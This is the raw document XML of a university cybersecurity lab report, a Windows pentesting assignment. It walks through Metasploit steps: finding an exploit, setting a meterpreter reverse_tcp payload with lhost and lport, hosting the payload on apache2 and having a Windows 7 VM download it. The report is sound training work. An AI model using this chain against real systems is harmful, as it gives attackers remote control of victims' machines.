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1814C7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3477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OLD DOMINION UNIVERSITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E1CF63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3477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CYSE 301 CYBERSECURITY TECHNIQUES AND OPERATIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DDF28A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AE6F5A" w14:textId="2F8D4928" w:rsidR="00945F69" w:rsidRPr="007D33C6" w:rsidRDefault="00945F69" w:rsidP="00945F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D33C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Assignment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3</w:t>
      </w:r>
      <w:r w:rsidRPr="007D33C6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Windows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Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69F293A7" w14:textId="77777777" w:rsidR="00945F69" w:rsidRPr="00A3477F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3477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_____________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A176435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E6C065F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13D1811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FD12ECC" w14:textId="77777777" w:rsidR="00945F69" w:rsidRDefault="00945F69" w:rsidP="00945F69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6FD3429" w14:textId="77777777" w:rsidR="00945F69" w:rsidRDefault="00945F69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Name: Evan Schranz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC6B9AD" w14:textId="643A4C62" w:rsidR="00945F69" w:rsidRDefault="00945F69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UIN: 01098709</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B914908" w14:textId="7FAB944A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464D9A9" w14:textId="5BFF0F1F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2F3F34C" w14:textId="43C99F0C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8E7738A" w14:textId="5248495A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A32E1D4" w14:textId="4D0E5D94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B28CF42" w14:textId="27A3DE4F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494538A" w14:textId="5955C2FA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A25D599" w14:textId="28803430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95ED49A" w14:textId="260EF682" w:rsidR="00AA3938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5CFB94D" w14:textId="473D56E3" w:rsidR="00AA3938" w:rsidRDefault="00AA3938" w:rsidP="00AA3938">
      <w:pPr>
        <w:spacing w:line="48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Task A: Break into the system </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1EEEE8" w14:textId="46C0092E" w:rsidR="00AA3938" w:rsidRPr="00AA3938" w:rsidRDefault="00AA3938" w:rsidP="00AA3938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Launch Metasploit on terminal-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cmd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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04CDDED8" w14:textId="03159640" w:rsidR="00945F69" w:rsidRDefault="00AA3938" w:rsidP="00945F69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6E31BE02" wp14:editId="4939198B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5943600" cy="3806190"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080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CB63B" w14:textId="502D0DD1" w:rsidR="00C26CC9" w:rsidRDefault="00FC476B"/>
    <w:p w14:paraId="6B77D82D" w14:textId="6FAD1A99" w:rsidR="00AA3938" w:rsidRDefault="00AA3938"/>
    <w:p w14:paraId="5EE26148" w14:textId="2DBAF12E" w:rsidR="00AA3938" w:rsidRDefault="00AA3938"/>
    <w:p w14:paraId="77C34C5F" w14:textId="1A55D079" w:rsidR="00AA3938" w:rsidRDefault="00AA3938"/>
    <w:p w14:paraId="692B8473" w14:textId="45852F75" w:rsidR="00AA3938" w:rsidRDefault="00AA3938"/>
    <w:p w14:paraId="217A62C3" w14:textId="6F2BA2B6" w:rsidR="00AA3938" w:rsidRDefault="00AA3938"/>
    <w:p w14:paraId="780E1214" w14:textId="4ED8941B" w:rsidR="00AA3938" w:rsidRDefault="00AA3938"/>
    <w:p w14:paraId="65B6BFF9" w14:textId="2EEFB070" w:rsidR="00AA3938" w:rsidRDefault="00AA3938"/>
    <w:p w14:paraId="3C5091A1" w14:textId="79EF9843" w:rsidR="00AA3938" w:rsidRDefault="00AA3938"/>
    <w:p w14:paraId="77B14D2E" w14:textId="67EACDE0" w:rsidR="00AA3938" w:rsidRDefault="00AA3938"/>
    <w:p w14:paraId="35E9076E" w14:textId="47CEE6DE" w:rsidR="00AA3938" w:rsidRDefault="00AA3938"/>
    <w:p w14:paraId="677BBFAB" w14:textId="1D59FDCC" w:rsidR="00AA3938" w:rsidRDefault="00AA3938"/>
    <w:p w14:paraId="4F86EB77" w14:textId="692935A0" w:rsidR="007C53B5" w:rsidRDefault="007C53B5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01DB89A4" wp14:editId="6E02FD24">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>60290</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6068639</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5366591" cy="3551353"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5080"/>
            <wp:wrapNone/>
            <wp:docPr id="2" name="Picture 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591" cy="3551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Filtering out the exploit- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: msf5&gt;search platform: “Windows sp1” type: exploit</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA36502" w14:textId="7D94AF2C" w:rsidR="007C53B5" w:rsidRDefault="007C53B5"/>
    <w:p w14:paraId="57866B1D" w14:textId="647B4C41" w:rsidR="007C53B5" w:rsidRDefault="007C53B5"/>
    <w:p w14:paraId="49E78F2F" w14:textId="18649422" w:rsidR="007C53B5" w:rsidRDefault="007C53B5"/>
    <w:p w14:paraId="101D0F45" w14:textId="7AEEBD65" w:rsidR="007C53B5" w:rsidRDefault="007C53B5"/>
    <w:p w14:paraId="2D4FA798" w14:textId="0FA73E64" w:rsidR="007C53B5" w:rsidRDefault="007C53B5"/>
    <w:p w14:paraId="3C68255D" w14:textId="05EBCCA2" w:rsidR="007C53B5" w:rsidRDefault="007C53B5"/>
    <w:p w14:paraId="572B3C0F" w14:textId="2A646FFE" w:rsidR="007C53B5" w:rsidRDefault="007C53B5"/>
    <w:p w14:paraId="4E402848" w14:textId="1D358017" w:rsidR="007C53B5" w:rsidRDefault="007C53B5"/>
    <w:p w14:paraId="40997CF9" w14:textId="4CEF7DF2" w:rsidR="007C53B5" w:rsidRDefault="007C53B5"/>
    <w:p w14:paraId="4CF42807" w14:textId="6CFB2286" w:rsidR="00AA3938" w:rsidRDefault="00AA3938"/>
    <w:p w14:paraId="796861FE" w14:textId="3EBC90C1" w:rsidR="007C53B5" w:rsidRDefault="000D27D6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020E1A5" wp14:editId="72C65BCC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>371615</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="3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View info about </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>explot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: ms04_045_wins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630A0877" w14:textId="12F39A98" w:rsidR="000D27D6" w:rsidRDefault="000D27D6"/>
    <w:p w14:paraId="267E7922" w14:textId="5CF9E4DE" w:rsidR="000D27D6" w:rsidRDefault="000D27D6"/>
    <w:p w14:paraId="79CDF87B" w14:textId="6DC26CBC" w:rsidR="000D27D6" w:rsidRDefault="000D27D6"/>
    <w:p w14:paraId="56D2516C" w14:textId="5D8A7014" w:rsidR="000D27D6" w:rsidRDefault="000D27D6"/>
    <w:p w14:paraId="22FA92EC" w14:textId="01E3318B" w:rsidR="000D27D6" w:rsidRDefault="000D27D6"/>
    <w:p w14:paraId="03F051C1" w14:textId="357D0BB1" w:rsidR="000D27D6" w:rsidRDefault="000D27D6"/>
    <w:p w14:paraId="19366713" w14:textId="571D1007" w:rsidR="000D27D6" w:rsidRDefault="000D27D6"/>
    <w:p w14:paraId="10FCCB5D" w14:textId="4D127B10" w:rsidR="000D27D6" w:rsidRDefault="000D27D6"/>
    <w:p w14:paraId="5907EB34" w14:textId="1FD7144B" w:rsidR="000D27D6" w:rsidRDefault="000D27D6"/>
    <w:p w14:paraId="19323207" w14:textId="35B5F389" w:rsidR="000D27D6" w:rsidRDefault="000D27D6"/>
    <w:p w14:paraId="204CA311" w14:textId="371883EA" w:rsidR="000D27D6" w:rsidRDefault="000D27D6"/>
    <w:p w14:paraId="42897F73" w14:textId="2FEB37A5" w:rsidR="000D27D6" w:rsidRDefault="000D27D6"/>
    <w:p w14:paraId="6DC278C0" w14:textId="589F4659" w:rsidR="000D27D6" w:rsidRDefault="000D27D6"/>
    <w:p w14:paraId="715AB40C" w14:textId="3FBA29E5" w:rsidR="000D27D6" w:rsidRDefault="000D27D6"/>
    <w:p w14:paraId="63E601A4" w14:textId="54B6EB79" w:rsidR="000D27D6" w:rsidRDefault="0000245F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74FED848" wp14:editId="56A818FD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>160774</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="4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FF6">
        <w:t xml:space="preserve">change the named handler- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00471FF6">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00471FF6">
        <w:t xml:space="preserve">: exploit/multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0874740D" w14:textId="7694CA32" w:rsidR="00471FF6" w:rsidRDefault="00471FF6"/>
    <w:p w14:paraId="451DD833" w14:textId="24FBF612" w:rsidR="00471FF6" w:rsidRDefault="00471FF6"/>
    <w:p w14:paraId="711BC656" w14:textId="5194BB1D" w:rsidR="00471FF6" w:rsidRDefault="00471FF6"/>
    <w:p w14:paraId="51DB3AB3" w14:textId="6267C5D5" w:rsidR="00471FF6" w:rsidRDefault="00471FF6"/>
    <w:p w14:paraId="421D704B" w14:textId="7E69C702" w:rsidR="00471FF6" w:rsidRDefault="00471FF6"/>
    <w:p w14:paraId="3B0488CB" w14:textId="3800B155" w:rsidR="00471FF6" w:rsidRDefault="00471FF6"/>
    <w:p w14:paraId="0D9FDEB3" w14:textId="492F442E" w:rsidR="00471FF6" w:rsidRDefault="00471FF6"/>
    <w:p w14:paraId="355779AB" w14:textId="77E3709B" w:rsidR="00471FF6" w:rsidRDefault="00471FF6"/>
    <w:p w14:paraId="6B63E231" w14:textId="71E9639D" w:rsidR="00471FF6" w:rsidRDefault="00471FF6"/>
    <w:p w14:paraId="219F7AF1" w14:textId="7E3C4198" w:rsidR="00471FF6" w:rsidRDefault="00471FF6"/>
    <w:p w14:paraId="68AD6073" w14:textId="5E59FBE9" w:rsidR="00471FF6" w:rsidRDefault="00471FF6"/>
    <w:p w14:paraId="3D21F535" w14:textId="7A69DEFC" w:rsidR="00471FF6" w:rsidRDefault="001E17F6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Set up the payload- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A9C651A" w14:textId="77777777" w:rsidR="001E17F6" w:rsidRDefault="001E17F6"/>
    <w:p w14:paraId="0875A027" w14:textId="752BEBD8" w:rsidR="000D27D6" w:rsidRDefault="001E17F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C2F7EEC" wp14:editId="713EF1B6">
            <wp:extent cx="5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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3B9C7" w14:textId="76FAC7F4" w:rsidR="0030605F" w:rsidRDefault="0030605F"/>
    <w:p w14:paraId="0DD5D27B" w14:textId="52213F3F" w:rsidR="0030605F" w:rsidRDefault="0030605F"/>
    <w:p w14:paraId="608443C1" w14:textId="4D282438" w:rsidR="006C686F" w:rsidRDefault="006C686F"/>
    <w:p w14:paraId="180261C5" w14:textId="2E6D8BD9" w:rsidR="006C686F" w:rsidRDefault="006C686F"/>
    <w:p w14:paraId="3B9AD009" w14:textId="3D2BB8B2" w:rsidR="006C686F" w:rsidRDefault="006C686F"/>
    <w:p w14:paraId="51594CD2" w14:textId="69E4EB0E" w:rsidR="006C686F" w:rsidRDefault="006C686F"/>
    <w:p w14:paraId="0E1A5EF7" w14:textId="24B9EC45" w:rsidR="006C686F" w:rsidRDefault="006C686F"/>
    <w:p w14:paraId="0BA9D1EF" w14:textId="0CE78084" w:rsidR="006C686F" w:rsidRDefault="006C686F"/>
    <w:p w14:paraId="2839EE65" w14:textId="517B5322" w:rsidR="006C686F" w:rsidRDefault="006C686F"/>
    <w:p w14:paraId="03313345" w14:textId="11889178" w:rsidR="006C686F" w:rsidRDefault="006C686F"/>
    <w:p w14:paraId="3F41734D" w14:textId="4CF11F1F" w:rsidR="006C686F" w:rsidRDefault="006C686F"/>
    <w:p w14:paraId="5943D368" w14:textId="1A12333F" w:rsidR="006C686F" w:rsidRDefault="006C686F"/>
    <w:p w14:paraId="4744B208" w14:textId="6C32A412" w:rsidR="006C686F" w:rsidRDefault="006C686F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Set up the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD2745" w14:textId="05B03738" w:rsidR="006C686F" w:rsidRDefault="006C686F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.217.3   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54430AE0" w14:textId="4A4DDD0B" w:rsidR="006C686F" w:rsidRDefault="006C686F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 30122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2825CD7C" w14:textId="5C0F3F14" w:rsidR="006C686F" w:rsidRDefault="00241BD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E1E3D0F" wp14:editId="5E757B7C">
            <wp:extent cx="5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="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61619" w14:textId="0CB9AAEE" w:rsidR="00241BD4" w:rsidRDefault="00241BD4">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
      <w:r w:rsidR="005C4E2E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="005C4E2E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C5C8FA0" wp14:editId="06FB3C8C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5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="8" name="Picture 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F9FF3" w14:textId="6F4E7FBA" w:rsidR="005C4E2E" w:rsidRDefault="005C4E2E"/>
    <w:p w14:paraId="3186FD9B" w14:textId="22BBE0AD" w:rsidR="005C4E2E" w:rsidRDefault="005C4E2E"/>
    <w:p w14:paraId="1CA71D9F" w14:textId="52282F42" w:rsidR="005C4E2E" w:rsidRDefault="005C4E2E"/>
    <w:p w14:paraId="6AA9D04A" w14:textId="0FA89482" w:rsidR="005C4E2E" w:rsidRDefault="005C4E2E"/>
    <w:p w14:paraId="5155E8BC" w14:textId="67CE6643" w:rsidR="005C4E2E" w:rsidRDefault="005C4E2E"/>
    <w:p w14:paraId="7435FCBE" w14:textId="562DEE26" w:rsidR="005C4E2E" w:rsidRDefault="005C4E2E"/>
    <w:p w14:paraId="3B15FBA6" w14:textId="5563F2F5" w:rsidR="005C4E2E" w:rsidRDefault="005C4E2E"/>
    <w:p w14:paraId="766C912B" w14:textId="3E0A1B9A" w:rsidR="005C4E2E" w:rsidRDefault="005C4E2E"/>
    <w:p w14:paraId="24D1BBE3" w14:textId="1D21BE3F" w:rsidR="005C4E2E" w:rsidRDefault="005C4E2E"/>
    <w:p w14:paraId="328C3501" w14:textId="47DA3118" w:rsidR="005C4E2E" w:rsidRDefault="005C4E2E"/>
    <w:p w14:paraId="189A355F" w14:textId="2197E8A7" w:rsidR="005C4E2E" w:rsidRDefault="002A61C4">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Open up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a new terminal and set the payload </w:t>
      </w:r>
      <w:r w:rsidR="005C220E">
        <w:t xml:space="preserve">(I used eschr002.exe for my payload name) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E350EAA" w14:textId="551F4154" w:rsidR="00CD7010" w:rsidRDefault="005C220E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B1A1D2B" wp14:editId="236A55DA">
            <wp:extent cx="5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="12" name="Picture 1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0690" w14:textId="5AEEC9EF" w:rsidR="005C220E" w:rsidRDefault="005C220E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="129BACBA" wp14:editId="190D4CE3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>210820</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="13" name="Picture 1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Check to see if everything is working using the ls-l command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315A4847" w14:textId="57026302" w:rsidR="005C220E" w:rsidRDefault="005C220E"/>
    <w:p w14:paraId="0D999149" w14:textId="7F4D7E2F" w:rsidR="005C220E" w:rsidRDefault="005C220E"/>
    <w:p w14:paraId="341EFB57" w14:textId="2511CE3E" w:rsidR="005C220E" w:rsidRDefault="005C220E"/>
    <w:p w14:paraId="5B6C3600" w14:textId="61607A89" w:rsidR="005C220E" w:rsidRDefault="005C220E"/>
    <w:p w14:paraId="4D49C01F" w14:textId="215C43C0" w:rsidR="005C220E" w:rsidRDefault="005C220E"/>
    <w:p w14:paraId="6B9FD219" w14:textId="6D4BEF82" w:rsidR="005C220E" w:rsidRDefault="005C220E"/>
    <w:p w14:paraId="153033C2" w14:textId="753E51BF" w:rsidR="005C220E" w:rsidRDefault="005C220E"/>
    <w:p w14:paraId="72D2F608" w14:textId="2235959B" w:rsidR="005C220E" w:rsidRDefault="005C220E"/>
    <w:p w14:paraId="7CB92928" w14:textId="666CD92B" w:rsidR="005C220E" w:rsidRDefault="005C220E"/>
    <w:p w14:paraId="78D4275A" w14:textId="7DF694A3" w:rsidR="005C220E" w:rsidRDefault="005C220E"/>
    <w:p w14:paraId="72818ACF" w14:textId="77777777" w:rsidR="005C220E" w:rsidRDefault="005C220E"/>
    <w:p w14:paraId="5BDF9F34" w14:textId="77777777" w:rsidR="005C220E" w:rsidRDefault="005C220E"/>
    <w:p w14:paraId="13F0081F" w14:textId="4CB6CDC6" w:rsidR="00CD7010" w:rsidRDefault="00CD7010">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Start up the apache2 web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C01134D" w14:textId="7D09DA00" w:rsidR="00F43D09" w:rsidRDefault="00F43D09">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="418BCADE" wp14:editId="14BDB172">
            <wp:extent cx="5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="14" name="Picture 1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4DDBC" w14:textId="7DFD3160" w:rsidR="00A976BB" w:rsidRDefault="00A976BB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33895898" wp14:editId="3DF1C0E7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-78105</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>186055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="15" name="Picture 1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010">
        <w:t xml:space="preserve">Use the cp command to </w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidR="00CD7010">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00CD7010">
        <w:t xml:space="preserve"> hyperlink for the payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C603601" w14:textId="01724C4B" w:rsidR="00A976BB" w:rsidRDefault="00A976BB"/>
    <w:p w14:paraId="4640236C" w14:textId="18EF2350" w:rsidR="00A976BB" w:rsidRDefault="00A976BB"/>
    <w:p w14:paraId="6443DDA4" w14:textId="08A34E64" w:rsidR="00A976BB" w:rsidRDefault="00A976BB"/>
    <w:p w14:paraId="2838BA7A" w14:textId="3A0EC10F" w:rsidR="00A976BB" w:rsidRDefault="00A976BB"/>
    <w:p w14:paraId="4DA11937" w14:textId="6C5EDD7A" w:rsidR="00A976BB" w:rsidRDefault="00A976BB"/>
    <w:p w14:paraId="1FC38859" w14:textId="2B5280B8" w:rsidR="00A976BB" w:rsidRDefault="00A976BB"/>
    <w:p w14:paraId="1720EA23" w14:textId="64C30BA4" w:rsidR="00A976BB" w:rsidRDefault="00A976BB"/>
    <w:p w14:paraId="29A284FF" w14:textId="5AD4EC1F" w:rsidR="00A976BB" w:rsidRDefault="00A976BB"/>
    <w:p w14:paraId="35735806" w14:textId="2504B433" w:rsidR="00A976BB" w:rsidRDefault="00A976BB"/>
    <w:p w14:paraId="4081D016" w14:textId="4F18A160" w:rsidR="00A976BB" w:rsidRDefault="00A976BB"/>
    <w:p w14:paraId="7EF3C15A" w14:textId="77777777" w:rsidR="00A976BB" w:rsidRDefault="00A976BB"/>
    <w:p w14:paraId="6977E41B" w14:textId="77777777" w:rsidR="00A976BB" w:rsidRDefault="00A976BB"/>
    <w:p w14:paraId="3CA8718B" w14:textId="4AB2E122" w:rsidR="00A976BB" w:rsidRDefault="00A976BB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Open windows 7 VM and type the link or IP address of the payload (as you can see the payload automatically downloads once entering the link) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B73BEC6" w14:textId="39CE3983" w:rsidR="00A976BB" w:rsidRDefault="009F7DBD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7FE3657D" wp14:editId="3B4CF3BA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>72231</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5441315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="17" name="Picture 17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, Word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6BB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03817DE9" wp14:editId="2D111A7D">
            <wp:extent cx="5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="16" name="Picture 16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8B232" w14:textId="60282035" w:rsidR="009F7DBD" w:rsidRDefault="009F7DBD"/>
    <w:p w14:paraId="53536CB7" w14:textId="5D8F9230" w:rsidR="009F7DBD" w:rsidRDefault="009F7DBD"/>
    <w:p w14:paraId="0CB5FA4E" w14:textId="0D420BE0" w:rsidR="009F7DBD" w:rsidRDefault="009F7DBD"/>
    <w:p w14:paraId="6EA5A1C8" w14:textId="44984A61" w:rsidR="009F7DBD" w:rsidRDefault="009F7DBD"/>
    <w:p w14:paraId="1DCDB559" w14:textId="333CA922" w:rsidR="009F7DBD" w:rsidRDefault="009F7DBD"/>
    <w:p w14:paraId="24AA6FE0" w14:textId="2099141C" w:rsidR="009F7DBD" w:rsidRDefault="009F7DBD"/>
    <w:p w14:paraId="4D3C19CA" w14:textId="7E51A260" w:rsidR="009F7DBD" w:rsidRDefault="009F7DBD"/>
    <w:p w14:paraId="0C70E430" w14:textId="5E5CE838" w:rsidR="009F7DBD" w:rsidRDefault="009F7DBD"/>
    <w:p w14:paraId="218014EB" w14:textId="31FB5F15" w:rsidR="009F7DBD" w:rsidRDefault="009F7DBD"/>
    <w:p w14:paraId="64372360" w14:textId="487CB44E" w:rsidR="009F7DBD" w:rsidRDefault="009F7DBD"/>
    <w:p w14:paraId="04D94E52" w14:textId="706FAC8B" w:rsidR="009F7DBD" w:rsidRDefault="009F7DBD"/>
    <w:p w14:paraId="72D3EBD2" w14:textId="72E63344" w:rsidR="009F7DBD" w:rsidRDefault="009F7DBD"/>
